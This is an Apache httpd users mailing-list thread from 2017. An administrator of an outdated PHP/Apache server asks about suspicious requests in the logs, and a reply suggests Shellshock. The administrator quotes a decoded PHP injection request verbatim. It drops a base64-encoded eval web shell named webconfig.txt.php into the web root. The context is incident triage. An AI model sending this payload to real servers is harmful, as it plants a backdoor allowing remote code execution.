----- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote: > Actually now that I re-read the requests it also looks as shellshock succesful > attempt. > Operative system software not updated recently either?
> 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > : >> Have you tried to send those requests yourself and see what you get? >> Still those requests seem to be aimed at your php framework. >> Do you use a very old php version as well? Everything is old. php, OS, apache. This is to my account. It's a system i nearly oversaw, because we use it very rarely. But nevertheless, it should be updated. I know. And i learn. >>> What i find out already: >>> https://url-encoder.de/ helped me to decode the URL: >>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo >>> '->|';file_put_contents($_SERVER['DOCUME >>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo >>> '|<-'; >>> Currently i don't understand what this means. >>> I don't find a file webconfig.txt.php on my system. >>> Currently no weird process, no new user in /etc/passwd, no packtes to the >>> network which includes this ip. >>> Thankful for any tip. Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
